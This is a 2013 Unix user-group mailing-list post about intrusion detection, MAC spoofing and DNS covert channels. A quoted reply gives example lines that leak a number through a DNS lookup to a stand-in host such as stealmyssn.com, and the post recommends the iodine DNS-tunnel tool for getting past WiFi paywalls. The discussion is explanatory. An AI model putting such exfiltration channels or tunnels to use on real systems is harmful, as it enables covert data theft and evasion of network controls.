[Tfug] Lightweight IDS options/strategy/policy

Yan zardus at gmail.com
Thu Sep 26 01:18:33 MST 2013 

Out of curiosity, if you use MAC addresses for access control in your
network (unless that was a simplified example), how do you prevent MAC
spoofing on your networks? I'd imagine you'd have to go with something like
802.1x, at least.

On a slightly different topic: the DNS communication method you
demonstrated is quite realistic, aside from being a good example of a
covert channel. There's a cool tool called iodine (
http://code.kryo.se/iodine/) that uses the technique to create an
IP-over-DNS tunnel. It's intended use is punching through WiFi paywalls.
Just figured I'd toss it out there in case someone was unaware of it and
interested.


On Wed, Sep 25, 2013 at 4:28 PM, Bexley Hall <bexley401 at yahoo.com> wrote:

> Hi Kramer,
>
>
> On 9/25/2013 3:57 PM, Kramer Lee wrote:
>
>> "appears to only be "reading" from the outside world"
>>
>> Well, it depends on what they are reading.
>>
>> Probably the good info they get will be sent out encrypted.  If you
>> have some NSA grade encryption busters, you can see what it is and
>> maybe stop it.  If they have some NSA grade back-doors etc, they might
>> be able to get whatever they want.
>>
>
> nslookup(123771665.stealmyssn.**com <http://123771665.stealmyssn.com>)
>
> I.e., if you let an app *look* at something, you have to assume
> that it *can* pass that information to a third party despite
> any firewalls, etc. that you put in place.
>
> E.g., install a "weather reporting" app and the above could be passed
> resolving http://www.weatherthief.com/**currentweather/123771665.html<http://www.weatherthief.com/currentweather/123771665.html>
>
> If the system runs 24/7/365 then it can covertly pass a *boatload*
> of information without raising any eyebrows!
>
>
> ______________________________**_________________
> Tucson Free Unix Group - tfug at tfug.org
> Subscription Options:
> http://www.tfug.org/mailman/**listinfo/tfug_tfug.org<http://www.tfug.org/mailman/listinfo/tfug_tfug.org>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://tfug.org/pipermail/tfug_tfug.org/attachments/20130926/38a0619a/attachment-0002.html>

More information about the tfug mailing list